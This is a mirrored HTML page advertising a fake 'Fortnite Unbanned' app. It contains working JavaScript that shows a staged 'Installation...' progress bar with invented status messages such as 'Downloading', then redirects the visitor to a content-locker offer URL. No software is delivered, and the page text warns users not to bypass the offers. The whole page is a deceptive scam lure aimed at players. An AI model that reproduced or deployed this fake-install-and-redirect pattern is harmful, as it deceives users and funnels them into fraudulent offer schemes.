<html>

<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="pushsdk" content="0b3aea1c0f84c935acb87c8cc9a720bb">
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="../../maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="../../netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap-glyphicons.css" rel="stylesheet">

    <!-- Styles -->
    <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300,600" rel="stylesheet" type="text/css">
    <link href="build/panel/app.css" rel="stylesheet">
    <link href="css/app.css" rel="stylesheet">
    <link href="css/framework7.css" rel="stylesheet">


    
    <script src="../../ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>


</head>
<body>
<main class="page-content framework7-root">
    <div class="page-inner white-bg">
        <div id="main-wrapper">
            <div class="row">
                <div class="col-md-6 col-xs-12 col-sm-12 center">
                    <div class="main-page-title">

                    </div>
                    <br>
                    <div class="app-box appscloud-block">
                                                    <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon" src="./s4.png" style="border-radius: 19px;">
                                    <div class="app-info">
						
                                     <div class="app-name">Fortnite Unbanned</div>
										
                                        <p class="app-version" style="font-size: 10px"><b>No Jailbreak iOS 11, 12, 13, 14 and Android 7.1+</b><br>Installing the app requires to follow instruction.Do not try to bypass offers.It's saving our server from bot traffic and using our server by 3rd party websites. Respect our work in tweak apps for you</p>
									<br><br>
									<b>THE GAME EMULATION:</b> NO<br>
									<b>HOW:</b> GForce NOW<br><br>
									
									   <a href="#" onclick="install('./s4.png', 'Fortnite','og_geo_seperator')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>Install</b></span>
                                    </a>
										<br><br>
Fortnite is an online video game developed by Epic Games and released in 2017. It is available in three distinct game mode versions that otherwise share the same general gameplay and game engine: Fortnite: Save the World, a cooperative hybrid-tower defense-shooter-survival game for up to four players to fight off zombie-like creatures and defend objects with traps and fortifications they can build; Fortnite Battle Royale, a free-to-play battle royale game in which up to 100 players fight to be the last person standing; and Fortnite Creative, in which players are given complete freedom to create worlds and battle arenas..<br>
									<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/0/0e/FortniteLogo.svg/250px-FortniteLogo.svg.png">
                                    </div>
                                 
                                    <div class="clearfix"></div>
                                </div>
                            </div>
                                 
                                                  
                                                
                        
                        
                        

                    </div>
                    
                    
                  
                    

                </div>
            </div><!-- Row -->
        </div><!-- Main Wrapper -->
    </div><!-- Page Inner -->
</main><!-- Page Content -->

<div class="popup modal-in" id="install" style="background: #fff; display: none;">
    <div class="fake-homescreen" style="">
        <a id="close" class="close-button"></a>
        <div class="iphone-display" aria-hidden="true">
            <div class="app-icon-area">
                <div class="app-icon-region">
                    <img id="app_icon" alt="app icon" src="#" class="app-modal-icon" style="width: 33px; height: 33px;">
                </div>
                <div class="fake-homescreen-app-name" style="font-size:7.5px!important">
                    <span id="app_name" class="installingAppName">Pokemon Go Spoofing</span>
                </div>
            </div>
        </div>
    </div>
    <div class="block" style="color:#000000">
        <center>
            <div>
                <div class="app-caption">
                    <h2 id="app-caption-title">title</h2>
                    <p>Follow the instructions on the next screen. If you not follow, it will not work.</p>
                </div>
                <hr>
                <div class="details">
                    <a class="btn btn-info btn-block install-btn" onclick="start()" id="install-btn">Install</a>
                </div>
            </div>
        </center>
    </div>
</div>
<div role="dialog">

    <div class="md" id="myPopup1" style="display: none">
        <div class="dialog-backdrop backdrop-in"></div>
        <div class="dialog dialog-no-buttons dialog-progress modal-in" id="myPopup" style="display: none; margin-top: -100px;">

            <div class="dialog-inner">
                <div class="dialog-title">Installation...</div><div id="dt" class="dialog-text">Sit tight</div>
                <div class="progressbar">
                    <span id="bar1" style="width: 0%; display: inline-block; height: 100%; transform: scale(-1, 1);"></span>
                </div>
            </div>

        </div>
    </div>
</div>
<script>

    function id(id){
        return document.getElementById(id);
    }

    function install(icon, name, locker_id)
    {
        id("app_icon").src = icon;
        id("app_name").innerHTML = name;
        id("app-caption-title").innerHTML = name;

        window.lcr = "https://www.verifysuper.com/cl.php?id=c4cb60840d8ca405224b7afe98cf38a5";
        id("install").style.display = "block";
    }

    id('close').onclick = function(){
        id("install").style.display = "none";
    }

    // When the user clicks on div, open the popup
    function start() {
        var x = document.getElementById("myPopup1");
        if (x.style.display === "none") {
            x.style.display = "block";
        } else {
            x.style.display = "none";
        }
        var x = document.getElementById("myPopup");
        if (x.style.display === "none") {
            x.style.display = "block";
        } else {
            x.style.display = "none";
        }

        var i = 0;
        $("#bar1").animate(
                {width: "100%"},
                {
                    duration: 20000,
                    complete : function(){
                        location.href = window.lcr;
                    }
                });


        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Connecting to the servers')
            }

            setTimeout(changeText, 1000);

        });
        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Getting package url')
            }

            setTimeout(changeText, 8000);

        });
        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Downloading')
            }

            setTimeout(changeText, 12000);

        });

        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Setting up final stage')
            }

            setTimeout(changeText, 17000);

        });


    }
</script>
</body>


</html>